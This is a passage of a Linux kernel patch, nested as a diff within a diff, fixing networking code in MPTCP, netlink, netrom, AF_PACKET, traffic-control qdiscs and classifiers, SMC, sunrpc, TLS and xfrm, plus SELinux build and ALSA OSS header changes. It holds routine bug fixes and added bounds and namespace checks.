+-static int mptcp_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+-				int addr_len, int flags)
+-{
+-	int ret;
+-
+-	lock_sock(sock->sk);
+-	mptcp_sk(sock->sk)->connect_flags = flags;
+-	ret = __inet_stream_connect(sock, uaddr, addr_len, flags, 0);
+-	release_sock(sock->sk);
+-	return ret;
+-}
+-
+ static int mptcp_listen(struct socket *sock, int backlog)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sock->sk);
+@@ -3746,7 +3757,10 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 
+ 	pr_debug("msk=%p", msk);
+ 
+-	ssock = __mptcp_nmpc_socket(msk);
++	/* Buggy applications can call accept on socket states other than LISTEN,
++	 * but there is no need to allocate the first subflow just to error out.
++	 */
++	ssock = READ_ONCE(msk->subflow);
+ 	if (!ssock)
+ 		return -EINVAL;
+ 
+@@ -3791,9 +3805,6 @@ static __poll_t mptcp_check_writeable(struct mptcp_sock *msk)
+ {
+ 	struct sock *sk = (struct sock *)msk;
+ 
+-	if (unlikely(sk->sk_shutdown & SEND_SHUTDOWN))
+-		return EPOLLOUT | EPOLLWRNORM;
+-
+ 	if (sk_stream_is_writeable(sk))
+ 		return EPOLLOUT | EPOLLWRNORM;
+ 
+@@ -3811,6 +3822,7 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 	struct sock *sk = sock->sk;
+ 	struct mptcp_sock *msk;
+ 	__poll_t mask = 0;
++	u8 shutdown;
+ 	int state;
+ 
+ 	msk = mptcp_sk(sk);
+@@ -3819,23 +3831,30 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 	state = inet_sk_state_load(sk);
+ 	pr_debug("msk=%p state=%d flags=%lx", msk, state, msk->flags);
+ 	if (state == TCP_LISTEN) {
+-		if (WARN_ON_ONCE(!msk->subflow || !msk->subflow->sk))
++		struct socket *ssock = READ_ONCE(msk->subflow);
++
++		if (WARN_ON_ONCE(!ssock || !ssock->sk))
+ 			return 0;
+ 
+-		return inet_csk_listen_poll(msk->subflow->sk);
++		return inet_csk_listen_poll(ssock->sk);
+ 	}
+ 
++	shutdown = READ_ONCE(sk->sk_shutdown);
++	if (shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
++		mask |= EPOLLHUP;
++	if (shutdown & RCV_SHUTDOWN)
++		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
++
+ 	if (state != TCP_SYN_SENT && state != TCP_SYN_RECV) {
+ 		mask |= mptcp_check_readable(msk);
+-		mask |= mptcp_check_writeable(msk);
++		if (shutdown & SEND_SHUTDOWN)
++			mask |= EPOLLOUT | EPOLLWRNORM;
++		else
++			mask |= mptcp_check_writeable(msk);
+ 	} else if (state == TCP_SYN_SENT && inet_sk(sk)->defer_connect) {
+ 		/* cf tcp_poll() note about TFO */
+ 		mask |= EPOLLOUT | EPOLLWRNORM;
+ 	}
+-	if (sk->sk_shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
+-		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
+-		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
+ 
+ 	/* This barrier is coupled with smp_wmb() in __mptcp_error_report() */
+ 	smp_rmb();
+@@ -3850,7 +3869,7 @@ static const struct proto_ops mptcp_stream_ops = {
+ 	.owner		   = THIS_MODULE,
+ 	.release	   = inet_release,
+ 	.bind		   = mptcp_bind,
+-	.connect	   = mptcp_stream_connect,
++	.connect	   = inet_stream_connect,
+ 	.socketpair	   = sock_no_socketpair,
+ 	.accept		   = mptcp_stream_accept,
+ 	.getname	   = inet_getname,
+@@ -3945,7 +3964,7 @@ static const struct proto_ops mptcp_v6_stream_ops = {
+ 	.owner		   = THIS_MODULE,
+ 	.release	   = inet6_release,
+ 	.bind		   = mptcp_bind,
+-	.connect	   = mptcp_stream_connect,
++	.connect	   = inet_stream_connect,
+ 	.socketpair	   = sock_no_socketpair,
+ 	.accept		   = mptcp_stream_accept,
+ 	.getname	   = inet6_getname,
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 441feeaeb2427..55fc5e42082e0 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -288,7 +288,6 @@ struct mptcp_sock {
+ 			nodelay:1,
+ 			fastopening:1,
+ 			in_accept_queue:1;
+-	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+ 	struct rb_root  out_of_order_queue;
+@@ -297,7 +296,11 @@ struct mptcp_sock {
+ 	struct list_head rtx_queue;
+ 	struct mptcp_data_frag *first_pending;
+ 	struct list_head join_list;
+-	struct socket	*subflow; /* outgoing connect/listener/!mp_capable */
++	struct socket	*subflow; /* outgoing connect/listener/!mp_capable
++				   * The mptcp ops can safely dereference the subflow
++				   * outside the socket lock, using suitable ONCE
++				   * annotations, as such a sock is freed after close().
++				   */
+ 	struct sock	*first;
+ 	struct mptcp_pm_data	pm;
+ 	struct {
+@@ -602,7 +605,6 @@ int mptcp_is_checksum_enabled(const struct net *net);
+ int mptcp_allow_join_id0(const struct net *net);
+ unsigned int mptcp_stale_loss_cnt(const struct net *net);
+ int mptcp_get_pm_type(const struct net *net);
+-void mptcp_copy_inaddrs(struct sock *msk, const struct sock *ssk);
+ void mptcp_subflow_fully_established(struct mptcp_subflow_context *subflow,
+ 				     struct mptcp_options_received *mp_opt);
+ bool __mptcp_retransmit_pending_data(struct sock *sk);
+@@ -671,9 +673,10 @@ void __init mptcp_proto_init(void);
+ int __init mptcp_proto_v6_init(void);
+ #endif
+ 
+-struct sock *mptcp_sk_clone(const struct sock *sk,
+-			    const struct mptcp_options_received *mp_opt,
+-			    struct request_sock *req);
++struct sock *mptcp_sk_clone_init(const struct sock *sk,
++				 const struct mptcp_options_received *mp_opt,
++				 struct sock *ssk,
++				 struct request_sock *req);
+ void mptcp_get_options(const struct sk_buff *skb,
+ 		       struct mptcp_options_received *mp_opt);
+ 
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 67ddbf6f2e4ee..336878f8a222a 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -633,14 +633,6 @@ static bool subflow_hmac_valid(const struct request_sock *req,
+ 	return !crypto_memneq(hmac, mp_opt->hmac, MPTCPOPT_HMAC_LEN);
+ }
+ 
+-static void mptcp_force_close(struct sock *sk)
+-{
+-	/* the msk is not yet exposed to user-space, and refcount is 2 */
+-	inet_sk_state_store(sk, TCP_CLOSE);
+-	sk_common_release(sk);
+-	sock_put(sk);
+-}
+-
+ static void subflow_ulp_fallback(struct sock *sk,
+ 				 struct mptcp_subflow_context *old_ctx)
+ {
+@@ -693,7 +685,6 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_subflow_request_sock *subflow_req;
+ 	struct mptcp_options_received mp_opt;
+ 	bool fallback, fallback_is_fatal;
+-	struct sock *new_msk = NULL;
+ 	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+@@ -722,14 +713,9 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 		 * options.
+ 		 */
+ 		mptcp_get_options(skb, &mp_opt);
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC)) {
++		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC))
+ 			fallback = true;
+-			goto create_child;
+-		}
+ 
+-		new_msk = mptcp_sk_clone(listener->conn, &mp_opt, req);
+-		if (!new_msk)
+-			fallback = true;
+ 	} else if (subflow_req->mp_join) {
+ 		mptcp_get_options(skb, &mp_opt);
+ 		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ) ||
+@@ -758,47 +744,19 @@ create_child:
+ 				subflow_add_reset_reason(skb, MPTCP_RST_EMPTCP);
+ 				goto dispose_child;
+ 			}
+-
+-			if (new_msk)
+-				mptcp_copy_inaddrs(new_msk, child);
+-			mptcp_subflow_drop_ctx(child);
+-			goto out;
++			goto fallback;
+ 		}
+ 
+ 		/* ssk inherits options of listener sk */
+ 		ctx->setsockopt_seq = listener->setsockopt_seq;
+ 
+ 		if (ctx->mp_capable) {
+-			owner = mptcp_sk(new_msk);
+-
+-			/* this can't race with mptcp_close(), as the msk is
+-			 * not yet exposted to user-space
+-			 */
+-			inet_sk_state_store((void *)new_msk, TCP_ESTABLISHED);
+-
+-			/* record the newly created socket as the first msk
+-			 * subflow, but don't link it yet into conn_list
+-			 */
+-			WRITE_ONCE(owner->first, child);
++			ctx->conn = mptcp_sk_clone_init(listener->conn, &mp_opt, child, req);
++			if (!ctx->conn)
++				goto fallback;
+ 
+-			/* new mpc subflow takes ownership of the newly
+-			 * created mptcp socket
+-			 */
+-			mptcp_sk(new_msk)->setsockopt_seq = ctx->setsockopt_seq;
++			owner = mptcp_sk(ctx->conn);
+ 			mptcp_pm_new_connection(owner, child, 1);
+-			mptcp_token_accept(subflow_req, owner);
+-			ctx->conn = new_msk;
+-			new_msk = NULL;
+-
+-			/* set msk addresses early to ensure mptcp_pm_get_local_id()
+-			 * uses the correct data
+-			 */
+-			mptcp_copy_inaddrs(ctx->conn, child);
+-			mptcp_propagate_sndbuf(ctx->conn, child);
+-
+-			mptcp_rcv_space_init(owner, child);
+-			list_add(&ctx->node, &owner->conn_list);
+-			sock_hold(child);
+ 
+ 			/* with OoO packets we can reach here without ingress
+ 			 * mpc option
+@@ -838,11 +796,6 @@ create_child:
+ 		}
+ 	}
+ 
+-out:
+-	/* dispose of the left over mptcp master, if any */
+-	if (unlikely(new_msk))
+-		mptcp_force_close(new_msk);
+-
+ 	/* check for expected invariant - should never trigger, just help
+ 	 * catching eariler subtle bugs
+ 	 */
+@@ -860,6 +813,10 @@ dispose_child:
+ 
+ 	/* The last child reference will be released by the caller */
+ 	return child;
++
++fallback:
++	mptcp_subflow_drop_ctx(child);
++	return child;
+ }
+ 
+ static struct inet_connection_sock_af_ops subflow_specific __ro_after_init;
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 857cddd9d82e5..9ee8abd3e4b10 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -2976,7 +2976,9 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
++#if IS_ENABLED(CONFIG_NF_NAT)
+ static const union nf_inet_addr any_addr;
++#endif
+ 
+ static __be32 nf_expect_get_id(const struct nf_conntrack_expect *exp)
+ {
+@@ -3460,10 +3462,12 @@ ctnetlink_change_expect(struct nf_conntrack_expect *x,
+ 	return 0;
+ }
+ 
++#if IS_ENABLED(CONFIG_NF_NAT)
+ static const struct nla_policy exp_nat_nla_policy[CTA_EXPECT_NAT_MAX+1] = {
+ 	[CTA_EXPECT_NAT_DIR]	= { .type = NLA_U32 },
+ 	[CTA_EXPECT_NAT_TUPLE]	= { .type = NLA_NESTED },
+ };
++#endif
+ 
+ static int
+ ctnetlink_parse_expect_nat(const struct nlattr *attr,
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index d1b19618890b7..6d493a0ccf399 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1768,7 +1768,7 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 				break;
+ 			}
+ 		}
+-		if (put_user(ALIGN(nlk->ngroups / 8, sizeof(u32)), optlen))
++		if (put_user(ALIGN(BITS_TO_BYTES(nlk->ngroups), sizeof(u32)), optlen))
+ 			err = -EFAULT;
+ 		netlink_unlock_table();
+ 		return err;
+diff --git a/net/netrom/nr_subr.c b/net/netrom/nr_subr.c
+index 3f99b432ea707..e2d2af924cff4 100644
+--- a/net/netrom/nr_subr.c
++++ b/net/netrom/nr_subr.c
+@@ -123,7 +123,7 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 	unsigned char  *dptr;
+ 	int len, timeout;
+ 
+-	len = NR_NETWORK_LEN + NR_TRANSPORT_LEN;
++	len = NR_TRANSPORT_LEN;
+ 
+ 	switch (frametype & 0x0F) {
+ 	case NR_CONNREQ:
+@@ -141,7 +141,8 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 		return;
+ 	}
+ 
+-	if ((skb = alloc_skb(len, GFP_ATOMIC)) == NULL)
++	skb = alloc_skb(NR_NETWORK_LEN + len, GFP_ATOMIC);
++	if (!skb)
+ 		return;
+ 
+ 	/*
+@@ -149,7 +150,7 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 	 */
+ 	skb_reserve(skb, NR_NETWORK_LEN);
+ 
+-	dptr = skb_put(skb, skb_tailroom(skb));
++	dptr = skb_put(skb, len);
+ 
+ 	switch (frametype & 0x0F) {
+ 	case NR_CONNREQ:
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 67771b0f57719..6ab9d5b543387 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3193,6 +3193,9 @@ static int packet_do_bind(struct sock *sk, const char *name, int ifindex,
+ 
+ 	lock_sock(sk);
+ 	spin_lock(&po->bind_lock);
++	if (!proto)
++		proto = po->num;
++
+ 	rcu_read_lock();
+ 
+ 	if (po->fanout) {
+@@ -3291,7 +3294,7 @@ static int packet_bind_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 	memcpy(name, uaddr->sa_data, sizeof(uaddr->sa_data));
+ 	name[sizeof(uaddr->sa_data)] = 0;
+ 
+-	return packet_do_bind(sk, name, 0, pkt_sk(sk)->num);
++	return packet_do_bind(sk, name, 0, 0);
+ }
+ 
+ static int packet_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len)
+@@ -3308,8 +3311,7 @@ static int packet_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len
+ 	if (sll->sll_family != AF_PACKET)
+ 		return -EINVAL;
+ 
+-	return packet_do_bind(sk, NULL, sll->sll_ifindex,
+-			      sll->sll_protocol ? : pkt_sk(sk)->num);
++	return packet_do_bind(sk, NULL, sll->sll_ifindex, sll->sll_protocol);
+ }
+ 
+ static struct proto packet_proto = {
+diff --git a/net/packet/diag.c b/net/packet/diag.c
+index d704c7bf51b20..a68a84574c739 100644
+--- a/net/packet/diag.c
++++ b/net/packet/diag.c
+@@ -143,7 +143,7 @@ static int sk_diag_fill(struct sock *sk, struct sk_buff *skb,
+ 	rp = nlmsg_data(nlh);
+ 	rp->pdiag_family = AF_PACKET;
+ 	rp->pdiag_type = sk->sk_type;
+-	rp->pdiag_num = ntohs(po->num);
++	rp->pdiag_num = ntohs(READ_ONCE(po->num));
+ 	rp->pdiag_ino = sk_ino;
+ 	sock_diag_save_cookie(sk, rp->pdiag_cookie);
+ 
+diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c
+index 25bc57ee6ea10..3de72e7c1075a 100644
+--- a/net/sched/cls_flower.c
++++ b/net/sched/cls_flower.c
+@@ -1147,6 +1147,9 @@ static int fl_set_geneve_opt(const struct nlattr *nla, struct fl_flow_key *key,
+ 	if (option_len > sizeof(struct geneve_opt))
+ 		data_len = option_len - sizeof(struct geneve_opt);
+ 
++	if (key->enc_opts.len > FLOW_DIS_TUN_OPTS_MAX - 4)
++		return -ERANGE;
++
+ 	opt = (struct geneve_opt *)&key->enc_opts.data[key->enc_opts.len];
+ 	memset(opt, 0xff, option_len);
+ 	opt->length = data_len / 4;
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index c82532e206992..f6a7b876d5954 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1241,7 +1241,12 @@ static struct Qdisc *qdisc_create(struct net_device *dev,
+ 	sch->parent = parent;
+ 
+ 	if (handle == TC_H_INGRESS) {
+-		sch->flags |= TCQ_F_INGRESS;
++		if (!(sch->flags & TCQ_F_INGRESS)) {
++			NL_SET_ERR_MSG(extack,
++				       "Specified parent ID is reserved for ingress and clsact Qdiscs");
++			err = -EINVAL;
++			goto err_out3;
++		}
+ 		handle = TC_H_MAKE(TC_H_INGRESS, 0);
+ 	} else {
+ 		if (handle == 0) {
+@@ -1586,11 +1591,20 @@ replay:
+ 					NL_SET_ERR_MSG(extack, "Invalid qdisc name");
+ 					return -EINVAL;
+ 				}
++				if (q->flags & TCQ_F_INGRESS) {
++					NL_SET_ERR_MSG(extack,
++						       "Cannot regraft ingress or clsact Qdiscs");
++					return -EINVAL;
++				}
+ 				if (q == p ||
+ 				    (p && check_loop(q, p, 0))) {
+ 					NL_SET_ERR_MSG(extack, "Qdisc parent/child loop detected");
+ 					return -ELOOP;
+ 				}
++				if (clid == TC_H_INGRESS) {
++					NL_SET_ERR_MSG(extack, "Ingress cannot graft directly");
++					return -EINVAL;
++				}
+ 				qdisc_refcount_inc(q);
+ 				goto graft;
+ 			} else {
+diff --git a/net/sched/sch_ingress.c b/net/sched/sch_ingress.c
+index 84838128b9c5b..e43a454993723 100644
+--- a/net/sched/sch_ingress.c
++++ b/net/sched/sch_ingress.c
+@@ -80,6 +80,9 @@ static int ingress_init(struct Qdisc *sch, struct nlattr *opt,
+ 	struct net_device *dev = qdisc_dev(sch);
+ 	int err;
+ 
++	if (sch->parent != TC_H_INGRESS)
++		return -EOPNOTSUPP;
++
+ 	net_inc_ingress_queue();
+ 
+ 	mini_qdisc_pair_init(&q->miniqp, sch, &dev->miniq_ingress);
+@@ -101,6 +104,9 @@ static void ingress_destroy(struct Qdisc *sch)
+ {
+ 	struct ingress_sched_data *q = qdisc_priv(sch);
+ 
++	if (sch->parent != TC_H_INGRESS)
++		return;
++
+ 	tcf_block_put_ext(q->block, sch, &q->block_info);
+ 	net_dec_ingress_queue();
+ }
+@@ -134,7 +140,7 @@ static struct Qdisc_ops ingress_qdisc_ops __read_mostly = {
+ 	.cl_ops			=	&ingress_class_ops,
+ 	.id			=	"ingress",
+ 	.priv_size		=	sizeof(struct ingress_sched_data),
+-	.static_flags		=	TCQ_F_CPUSTATS,
++	.static_flags		=	TCQ_F_INGRESS | TCQ_F_CPUSTATS,
+ 	.init			=	ingress_init,
+ 	.destroy		=	ingress_destroy,
+ 	.dump			=	ingress_dump,
+@@ -219,6 +225,9 @@ static int clsact_init(struct Qdisc *sch, struct nlattr *opt,
+ 	struct net_device *dev = qdisc_dev(sch);
+ 	int err;
+ 
++	if (sch->parent != TC_H_CLSACT)
++		return -EOPNOTSUPP;
++
+ 	net_inc_ingress_queue();
+ 	net_inc_egress_queue();
+ 
+@@ -248,6 +257,9 @@ static void clsact_destroy(struct Qdisc *sch)
+ {
+ 	struct clsact_sched_data *q = qdisc_priv(sch);
+ 
++	if (sch->parent != TC_H_CLSACT)
++		return;
++
+ 	tcf_block_put_ext(q->egress_block, sch, &q->egress_block_info);
+ 	tcf_block_put_ext(q->ingress_block, sch, &q->ingress_block_info);
+ 
+@@ -269,7 +281,7 @@ static struct Qdisc_ops clsact_qdisc_ops __read_mostly = {
+ 	.cl_ops			=	&clsact_class_ops,
+ 	.id			=	"clsact",
+ 	.priv_size		=	sizeof(struct clsact_sched_data),
+-	.static_flags		=	TCQ_F_CPUSTATS,
++	.static_flags		=	TCQ_F_INGRESS | TCQ_F_CPUSTATS,
+ 	.init			=	clsact_init,
+ 	.destroy		=	clsact_destroy,
+ 	.dump			=	ingress_dump,
+diff --git a/net/smc/smc_llc.c b/net/smc/smc_llc.c
+index 524649d0ab652..3008dfdf7c55e 100644
+--- a/net/smc/smc_llc.c
++++ b/net/smc/smc_llc.c
+@@ -578,7 +578,10 @@ static struct smc_buf_desc *smc_llc_get_next_rmb(struct smc_link_group *lgr,
+ {
+ 	struct smc_buf_desc *buf_next;
+ 
+-	if (!buf_pos || list_is_last(&buf_pos->list, &lgr->rmbs[*buf_lst])) {
++	if (!buf_pos)
++		return _smc_llc_get_next_rmb(lgr, buf_lst);
++
++	if (list_is_last(&buf_pos->list, &lgr->rmbs[*buf_lst])) {
+ 		(*buf_lst)++;
+ 		return _smc_llc_get_next_rmb(lgr, buf_lst);
+ 	}
+@@ -614,6 +617,8 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 		goto out;
+ 	buf_pos = smc_llc_get_first_rmb(lgr, &buf_lst);
+ 	for (i = 0; i < ext->num_rkeys; i++) {
++		while (buf_pos && !(buf_pos)->used)
++			buf_pos = smc_llc_get_next_rmb(lgr, &buf_lst, buf_pos);
+ 		if (!buf_pos)
+ 			break;
+ 		rmb = buf_pos;
+@@ -623,8 +628,6 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 			cpu_to_be64((uintptr_t)rmb->cpu_addr) :
+ 			cpu_to_be64((u64)sg_dma_address(rmb->sgt[lnk_idx].sgl));
+ 		buf_pos = smc_llc_get_next_rmb(lgr, &buf_lst, buf_pos);
+-		while (buf_pos && !(buf_pos)->used)
+-			buf_pos = smc_llc_get_next_rmb(lgr, &buf_lst, buf_pos);
+ 	}
+ 	len += i * sizeof(ext->rt[0]);
+ out:
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index 7107fbcbff343..d808c00cdbac1 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -1338,25 +1338,10 @@ static struct svc_sock *svc_setup_socket(struct svc_serv *serv,
+ 	return svsk;
+ }
+ 
+-bool svc_alien_sock(struct net *net, int fd)
+-{
+-	int err;
+-	struct socket *sock = sockfd_lookup(fd, &err);
+-	bool ret = false;
+-
+-	if (!sock)
+-		goto out;
+-	if (sock_net(sock->sk) != net)
+-		ret = true;
+-	sockfd_put(sock);
+-out:
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(svc_alien_sock);
+-
+ /**
+  * svc_addsock - add a listener socket to an RPC service
+  * @serv: pointer to RPC service to which to add a new listener
++ * @net: caller's network namespace
+  * @fd: file descriptor of the new listener
+  * @name_return: pointer to buffer to fill in with name of listener
+  * @len: size of the buffer
+@@ -1366,8 +1351,8 @@ EXPORT_SYMBOL_GPL(svc_alien_sock);
+  * Name is terminated with '\n'.  On error, returns a negative errno
+  * value.
+  */
+-int svc_addsock(struct svc_serv *serv, const int fd, char *name_return,
+-		const size_t len, const struct cred *cred)
++int svc_addsock(struct svc_serv *serv, struct net *net, const int fd,
++		char *name_return, const size_t len, const struct cred *cred)
+ {
+ 	int err = 0;
+ 	struct socket *so = sockfd_lookup(fd, &err);
+@@ -1378,6 +1363,9 @@ int svc_addsock(struct svc_serv *serv, const int fd, char *name_return,
+ 
+ 	if (!so)
+ 		return err;
++	err = -EINVAL;
++	if (sock_net(so->sk) != net)
++		goto out;
+ 	err = -EAFNOSUPPORT;
+ 	if ((so->sk->sk_family != PF_INET) && (so->sk->sk_family != PF_INET6))
+ 		goto out;
+diff --git a/net/tls/tls_strp.c b/net/tls/tls_strp.c
+index da95abbb7ea32..f37f4a0fcd3c2 100644
+--- a/net/tls/tls_strp.c
++++ b/net/tls/tls_strp.c
+@@ -20,7 +20,9 @@ static void tls_strp_abort_strp(struct tls_strparser *strp, int err)
+ 	strp->stopped = 1;
+ 
+ 	/* Report an error on the lower socket */
+-	strp->sk->sk_err = -err;
++	WRITE_ONCE(strp->sk->sk_err, -err);
++	/* Paired with smp_rmb() in tcp_poll() */
++	smp_wmb();
+ 	sk_error_report(strp->sk);
+ }
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 992092aeebad9..96b4545ea700f 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -67,7 +67,9 @@ noinline void tls_err_abort(struct sock *sk, int err)
+ {
+ 	WARN_ON_ONCE(err >= 0);
+ 	/* sk->sk_err should contain a positive error code. */
+-	sk->sk_err = -err;
++	WRITE_ONCE(sk->sk_err, -err);
++	/* Paired with smp_rmb() in tcp_poll() */
++	smp_wmb();
+ 	sk_error_report(sk);
+ }
+ 
+@@ -2287,8 +2289,12 @@ static void tls_data_ready(struct sock *sk)
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+ 	struct tls_sw_context_rx *ctx = tls_sw_ctx_rx(tls_ctx);
+ 	struct sk_psock *psock;
++	gfp_t alloc_save;
+ 
++	alloc_save = sk->sk_allocation;
++	sk->sk_allocation = GFP_ATOMIC;
+ 	tls_strp_data_ready(&ctx->strp);
++	sk->sk_allocation = alloc_save;
+ 
+ 	psock = sk_psock_get(sk);
+ 	if (psock) {
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index bc04cb83215f9..e894c269affb1 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3237,7 +3237,7 @@ xfrm_secpath_reject(int idx, struct sk_buff *skb, const struct flowi *fl)
+ 
+ static inline int
+ xfrm_state_ok(const struct xfrm_tmpl *tmpl, const struct xfrm_state *x,
+-	      unsigned short family)
++	      unsigned short family, u32 if_id)
+ {
+ 	if (xfrm_state_kern(x))
+ 		return tmpl->optional && !xfrm_state_addr_cmp(tmpl, x, tmpl->encap_family);
+@@ -3248,7 +3248,8 @@ xfrm_state_ok(const struct xfrm_tmpl *tmpl, const struct xfrm_state *x,
+ 		(tmpl->allalgs || (tmpl->aalgos & (1<<x->props.aalgo)) ||
+ 		 !(xfrm_id_proto_match(tmpl->id.proto, IPSEC_PROTO_ANY))) &&
+ 		!(x->props.mode != XFRM_MODE_TRANSPORT &&
+-		  xfrm_state_addr_cmp(tmpl, x, family));
++		  xfrm_state_addr_cmp(tmpl, x, family)) &&
++		(if_id == 0 || if_id == x->if_id);
+ }
+ 
+ /*
+@@ -3260,7 +3261,7 @@ xfrm_state_ok(const struct xfrm_tmpl *tmpl, const struct xfrm_state *x,
+  */
+ static inline int
+ xfrm_policy_ok(const struct xfrm_tmpl *tmpl, const struct sec_path *sp, int start,
+-	       unsigned short family)
++	       unsigned short family, u32 if_id)
+ {
+ 	int idx = start;
+ 
+@@ -3270,7 +3271,7 @@ xfrm_policy_ok(const struct xfrm_tmpl *tmpl, const struct sec_path *sp, int star
+ 	} else
+ 		start = -1;
+ 	for (; idx < sp->len; idx++) {
+-		if (xfrm_state_ok(tmpl, sp->xvec[idx], family))
++		if (xfrm_state_ok(tmpl, sp->xvec[idx], family, if_id))
+ 			return ++idx;
+ 		if (sp->xvec[idx]->props.mode != XFRM_MODE_TRANSPORT) {
+ 			if (start == -1)
+@@ -3649,7 +3650,7 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		 * are implied between each two transformations.
+ 		 */
+ 		for (i = xfrm_nr-1, k = 0; i >= 0; i--) {
+-			k = xfrm_policy_ok(tpp[i], sp, k, family);
++			k = xfrm_policy_ok(tpp[i], sp, k, family, if_id);
+ 			if (k < 0) {
+ 				if (k < -1)
+ 					/* "-2 - errored_index" returned */
+diff --git a/security/selinux/Makefile b/security/selinux/Makefile
+index 0aecf9334ec31..8b21520bd4b9f 100644
+--- a/security/selinux/Makefile
++++ b/security/selinux/Makefile
+@@ -26,5 +26,9 @@ quiet_cmd_flask = GEN     $(obj)/flask.h $(obj)/av_permissions.h
+       cmd_flask = $< $(obj)/flask.h $(obj)/av_permissions.h
+ 
+ targets += flask.h av_permissions.h
+-$(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/genheaders/genheaders FORCE
++# once make >= 4.3 is required, we can use grouped targets in the rule below,
++# which basically involves adding both headers and a '&' before the colon; see
++# the example below:
++#   $(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/...
++$(obj)/flask.h: scripts/selinux/genheaders/genheaders FORCE
+ 	$(call if_changed,flask)
+diff --git a/sound/core/oss/pcm_plugin.h b/sound/core/oss/pcm_plugin.h
+index 46e273bd4a786..50a6b50f5db4c 100644
+--- a/sound/core/oss/pcm_plugin.h
++++ b/sound/core/oss/pcm_plugin.h
+@@ -141,6 +141,14 @@ int snd_pcm_area_copy(const struct snd_pcm_channel_area *src_channel,
+ 
+ void *snd_pcm_plug_buf_alloc(struct snd_pcm_substream *plug, snd_pcm_uframes_t size);
+ void snd_pcm_plug_buf_unlock(struct snd_pcm_substream *plug, void *ptr);
++#else
++
++static inline snd_pcm_sframes_t snd_pcm_plug_client_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t drv_size) { return drv_size; }
++static inline snd_pcm_sframes_t snd_pcm_plug_slave_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t clt_size) { return clt_size; }
++static inline int snd_pcm_plug_slave_format(int format, const struct snd_mask *format_mask) { return format; }
++
++#endif
++
+ snd_pcm_sframes_t snd_pcm_oss_write3(struct snd_pcm_substream *substream,
+ 				     const char *ptr, snd_pcm_uframes_t size,
+ 				     int in_kernel);
+@@ -151,14 +159,6 @@ snd_pcm_sframes_t snd_pcm_oss_writev3(struct snd_pcm_substream *substream,
+ snd_pcm_sframes_t snd_pcm_oss_readv3(struct snd_pcm_substream *substream,
+ 				     void **bufs, snd_pcm_uframes_t frames);
+ 
+-#else
+-
+-static inline snd_pcm_sframes_t snd_pcm_plug_client_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t drv_size) { return drv_size; }
+-static inline snd_pcm_sframes_t snd_pcm_plug_slave_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t clt_size) { return clt_size; }
+-static inline int snd_pcm_plug_slave_format(int format, const struct snd_mask *format_mask) { return format; }
+-
+-#endif
+-
+ #ifdef PLUGIN_DEBUG
+ #define pdprintf(fmt, args...) printk(KERN_DEBUG "plugin: " fmt, ##args)
+ #else
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 881b2f3a1551f..3226691ac923c 100644
+--- a/sound/pci/hda/hda_intel.c
